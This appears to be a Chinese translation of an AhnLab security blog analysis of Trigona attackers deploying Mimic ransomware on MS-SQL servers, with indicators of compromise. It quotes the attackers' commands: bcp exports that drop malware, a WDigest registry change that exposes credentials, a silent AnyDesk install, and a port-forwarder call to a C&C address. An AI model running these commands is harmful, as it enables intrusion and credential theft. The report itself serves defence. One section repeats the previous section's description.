Trigona勒索软件攻击者使用了Mimic勒索软件

AhnLab 安全情报中心 （ASEC） 最近发现了一项新活动，其中 Trigona 勒索软件攻击者安装了 Mimic 勒索软件。这次确定的攻击案例针对 MS-SQL 服务器，与以前的案例类似，其特点是在安装恶意软件期间利用 MS-SQL 服务器的大容量复制程序 （BCP） 实用程序。

• Trigona 勒索软件：它至少从 2022 年 6 月开始活跃， 并且一直持续到最近，主要针对 MS-SQL 服务器。
• Mimic Ransomware：2022 年 6 月首次被发现， 2024 年 1 月，一名讲土耳其语的攻击者攻击了管理不当的 MS-SQL 服务器，以攻击 Mimic Ransomware。

2024 年 1 月初，ASEC 发现了第一个使用 BCP 安装 Mimic 勒索软件的攻击实例，并在 2024 年 1 月中旬确认在同一攻击案例中安装了 Trigona 勒索软件而不是 Mimic 勒索软件。Mimic Ransomware 赎金票据中使用的攻击者的电子邮件地址尚未在其他攻击中得到验证，但自 2023 年初以来被发现的 Trigona 勒索软件使用了 Trigona 勒索软件攻击者使用的电子邮件地址。

因此，2024 年 1 月中旬发现的攻击被认为是原始 Trigona 攻击者所为，而 2024 年 1 月初发现的 Mimic 勒索软件攻击也被认为是同一攻击者。这是基于以下事实：这两个案例都针对管理不当的 MS-SQL 服务器，BCP 用于安装恶意软件，并且攻击中使用的各种字符串和路径名是相同的。此外，每次攻击都使用了相同的恶意软件。

1. Trigona 勒索软件

Trigona 勒索软件是用 Delphi 语言开发的，并使用 RSA 和 AES 加密算法来加密文件。2023 年 2 月，Arete 发现了针对 ManageEngine 漏洞的攻击 （CVE-2021-40539）[5]，2023 年 4 月，该公司在其 ASEC 博客上披露了对管理不当的 MS-SQL 服务器的攻击。

这次攻击也像 2023 年一样针对 MS-SQL 服务器，勒索票据中存储的攻击者电子邮件地址显示，这次识别的 Trigona 勒索软件与之前的案例是同一个攻击者。

• 电子邮件 ： farusbig@tutanota[.]com
• 网址 ： hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/

图 1.加密文件和赎金票据

2. 模仿勒索软件

Mimic Ransomware 是一种勒索软件，它利用一个名为 Everything 的文件检索程序来查找需要加密的文件。据信，攻击者正在利用 Everything 工具来加快系统上文件的加密过程。此外，它还借鉴了 Conti 勒索软件的功能，其源代码在开发过程中被披露。

分别在 2023 年 1 月发布的 TrendMicro 报告和 2024 年 1 月发布的 Securonix 报告中发现的 Mimic 勒索软件在外观上与此次攻击中使用的勒索软件几乎相同。该恶意软件被创建为7z SFX可执行压缩文件，其中实际的恶意软件和所有工具都以加密方式压缩在名为“Everything64.dll”的压缩文件中。执行后，其中包含的 7z 和“Everything64.dll”存档将被提取并使用密码解压缩，如下所示：

> 7za.exe x -y -p58042791667523172 Everything64.dll
> 7za.exe x -y -p624417568130113444 Everything64.dll

图2.7z SFX 和压缩文件中包含的文件

除了 Mimic 勒索软件和 Everything 工具外，最终文件夹还包含来自 Sysinternals 的 Defender 控制工具 （DC.exe） 和 SDelete 工具 （xdel.exe），它们旨在禁用 Windows Defender。

图3.安装的文件

勒索信中列出的攻击者电子邮件地址与 2023 年 1 月发布的 TrendMicro 报告和 2024 年 1 月发布的 Securonix 报告中 Mimic 勒索软件使用的电子邮件地址不同，并且未在其他攻击案例中得到证实。相反，许多情况表明 Trigona 勒索软件攻击者正在他们的攻击中使用 Mimic 勒索软件。

• 电子邮件 ： getmydata@list.ru

图4.加密文件和赎金票据

3. 使用 BCP 安装恶意软件

据信，目标是管理不当的 MS-SQL 服务器，这些系统暴露在外部，并且由于简单的帐户信息而容易受到暴力攻击或字典攻击。这可以从以下事实推断：Trigona 勒索软件攻击者过去曾针对这些系统，以及 LoveMiner 和 Remcos RAT 等恶意软件在攻击前后安装的感染日志的存在。

3.1. 使用 BCP 创建文件

bcp.exe 是大容量复制程序 （BCP） 实用工具，是用于从 MS-SQL 服务器导入或导出大量外部数据的命令行工具。它通常用于将存储在 SQL Server 上的表中的大量数据存储到本地文件，或将本地存储的数据文件导出到 SQL Server 上的表。

通常，攻击 MS-SQL 服务器的攻击者使用 PowerShell 命令下载恶意软件，最近，他们还利用 SQLPS（SQL Server 附带的 PowerShell 工具）。然而，在这种情况下，攻击者被认为已将恶意软件存储在数据库中，然后使用BCP将其生成为本地文件。

图5.使用 BCP 生成恶意软件

据信，攻击者已使用存储 Trigona 勒索软件二进制文件的表“uGnzBdZbsi”中的以下命令将 Trigona 勒索软件导出到本地路径：作为参考，“FODsOZKgAU.txt”是一个格式化文件，可能包含格式信息。

图6.攻击中使用的 BCP 命令

以下是用于释放攻击中使用的各种恶意软件和工具的 BCP 命令。

Anydesk
> bcp “select binaryTable from uGnzBdZbsi” queryout “C：\users\%ASD%\music\AD.exe” -T -f “C：\users\%ASD%\music\FODsOZKgAU.txt”
Port Forwarder 악성코드
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
Launcher 악성코드
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
Mimic 랜섬웨어
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt”
Trigona 랜섬웨어
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
기타
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”

3.2. 信息查询

作为参考，攻击者在使用 BCP 创建恶意软件之前执行的第一个命令，即攻击成功后，是查询受感染系统信息的命令，如下所示。攻击者很可能根据通过这些命令获得的信息安装了适合该环境的恶意软件。

>主机名
> whoami
> wmic computersystem 获取域
> wmic computersystem 获取 totalphysicalmemory

3.3. 凭证信息窃取

作为参考，攻击者在使用 BCP 创建恶意软件之前执行的第一个命令，即攻击成功后，是查询受感染系统信息的命令，如下所示。攻击者很可能根据通过这些命令获得的信息安装了适合该环境的恶意软件。

> REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001

3.4. AnyDesk

此外，还安装了Anydesk来控制受感染的系统。AnyDesk 是一款远程管理工具，提供远程桌面、文件传输等功能。远程桌面是一种远程访问安装AnyDesk的环境（如RDP）的功能，并支持在GUI环境中进行控制。

Anydesk是大多数攻击组织以及传统的Trigona勒索软件攻击者使用的领先远程管理工具。远程管理工具通常用于正常目的，例如在家工作或进行远程控制和管理，因此，与常见的恶意软件不同，防病毒产品在简单地检测和阻止这些工具方面受到限制。攻击者利用这一点安装远程控制工具而不是 RAT 恶意软件，以在初始渗透或横向移动期间控制目标的系统。

> %SystemDrive%\users\%ASD%\music\AD.exe –install C：\“Program Files （x86）”\ –silent
> %SystemDrive%\“Program Files （x86）”\AnyDesk-ad_1514b2f9.exe –get-id”

4. 分析攻击中使用的恶意软件

除了BCP被滥用之外，该攻击的特点还在于使用了安全模式。Mimic Ransomware 和 Trigona Ransomware 攻击识别了另外两个似乎由攻击者创建的恶意软件。

一种是 Launcher 恶意软件，它将自己注册为可以在安全模式下运行的服务，并负责执行作为服务运行时作为参数发送的程序。另一种是端口转发器恶意软件，它在注册为也可以在安全模式下运行的服务后启用 RDP，并支持将 RDP 端口转发到作为参数传递的地址。

根据 PDB 信息，攻击者将 Launcher 恶意软件命名为“app2”，将端口转发器恶意软件命名为“client”。

图7.攻击者创建的具有类似 PDB 信息的恶意软件

尽管没有恶意软件或命令日志将系统启动设置为安全模式，但存在 MS-SQL Server 进程执行命令以重新启动系统的日志，例如：考虑到 Launcher 恶意软件在执行作为参数传递的恶意软件后禁用安全模式启动选项，假设攻击者在安装恶意软件后通过以安全模式重新启动系统来激活勒索软件。

> shutdown -r -f -t 5

4.1. 启动器恶意软件

攻击者通过传递以下参数来执行 Launcher 恶意软件：Launcher 恶意软件在执行时将自身复制到路径“C：\windows\temp\LeVfeNXHoa”。之后，我们根据收到的参数进行下一个操作，首先使用第一个参数绘制服务的名称，并使用第二个参数绘制要复制的文件的路径。在第二个参数中传递的路径中的文件将移动到在第三个参数中传递的路径。顺便说一句，作为第二个参数传递的文件是 Mimic 勒索软件。

> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”

Launcher 恶意软件使用第一个参数 （“1111111”） 注册自身并执行其他任务以确保它可以在安全模式下运行。之后，如果它作为服务工作，它将在作为第三个参数传递的路径中执行勒索软件，当该过程完成时，安全模式设置将被禁用，以便它可以再次正常启动。

图8.设置已注册服务的安全模式以及勒索软件执行后再次关闭的例程

4.2. 端口转发器

攻击者通过传递以下参数来执行端口转发器恶意软件：它是将从某个端口接收到的数据转发到另一个端口的功能。该恶意软件支持将端口转发到 RDP 服务，即端口 3389。通常，RDP相关的端口转发工具用于克服外部攻击者无法直接访问NAT环境的问题。

端口转发器使用反向连接首先连接到攻击者的地址，然后连接到受感染系统的 RDP 端口，从而调解两个通信。因此，即使系统在 NAT 环境中运行，攻击者也可以建立 RDP 连接，从而允许他们远程控制受感染的系统。由于它使用 RDP，因此恶意软件还可以通过执行以下命令来激活 RDP 服务：

图 9.RDP 服务激活例程

当端口转发器在安装模式下运行时，它会将自身复制到路径“C：\windows\temp\WindowsHostServicess.exe”，并使用名称“WindowsHostServicess”注册服务。与上面的 Launcher 恶意软件类似，该服务配置为在安全模式下工作。

> %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install

端口转发器有 5 个因素，其中 3 个是支持安装、卸载和运行的模式。在执行模式下，它连接到传入参数的 C&C 服务器，无需安装上述服务，并支持端口转发。

在连接到C&C服务器之前，它将操作系统信息以及用户和计算机名称等基本系统信息存储在路径“C：\windows\temp\elZDk6geQ8”中，并在首次连接时传输这些信息。

图 10.系统信息转发到 C&C 服务器

之后，您可以按照从 C&C 服务器收到的命令执行端口转发或自删除命令。

5. 结论

最近，Trigona Ransomware 攻击者一直在针对管理不当的 MS-SQL 服务器安装 Mimic Ransomware 和 Trigona Ransomware。还确认攻击者将尝试使用负责端口转发功能的恶意软件对受感染的系统进行 RDP 并远程控制它。

像 Trigona 这样的勒索软件攻击者通过加密受感染的系统并窃取敏感信息来敲诈勒索以牟利。此外，还使用各种技术来窃取凭证信息并横向移动，这样不仅单个系统，而且整个内部网络都可以被企业接管，这可能导致敏感信息被盗和网络内系统的加密。

对 MS-SQL 服务器的攻击包括对不当管理帐户信息的系统的暴力攻击和字典攻击。管理员应保护数据库服务器免受暴力攻击和字典攻击，方法是使用难以猜测的帐户密码并定期更改密码。

此外，您应该将 V3 更新到最新版本，以防止恶意软件提前感染。您还应该使用安全产品（如防火墙）来控制外部攻击者对公开可用和可访问的数据库服务器的访问。如果不采取上述措施，攻击者和恶意软件可能会继续感染它们。

IOC

MD5

a24bac9071fb6e07e13c52f65a093fce : Launcher (pp2.exe)
a6e2722cff3abb214dc1437647964c57 : Launcher (pp2.exe)
3e26e778a4d28003686596f988942646 : Port Forwarder (4.exe)
d6b4b1b6b0ec1799f57142798c5daf5b : Mimic Ransomware Dropper (K2K.exe)
6d44f8f3c1608e5958b40f9c6d7b6718 : Mimic Ransomware Dropper (K3K.exe)
b3c8d81d6f8d19e5c07e1ca7932ed5bf : Mimic Ransomware (K2K.exe)
a02157550bc9b491fd03cad394ccdfe7 : Mimic Ransomware (3usdaa.exe)
c28b33f7365f9dc72cc291d13458f334 : Trigona Ransomware (build.txt)
ac34ba84a5054cd701efad5dd14645c9 : Defender Control (DC.exe)

C&C

2.57.149[.]233:3366

参考链接：https://asec.ahnlab.com/ko/60744/

图片来源网络目标可联系删除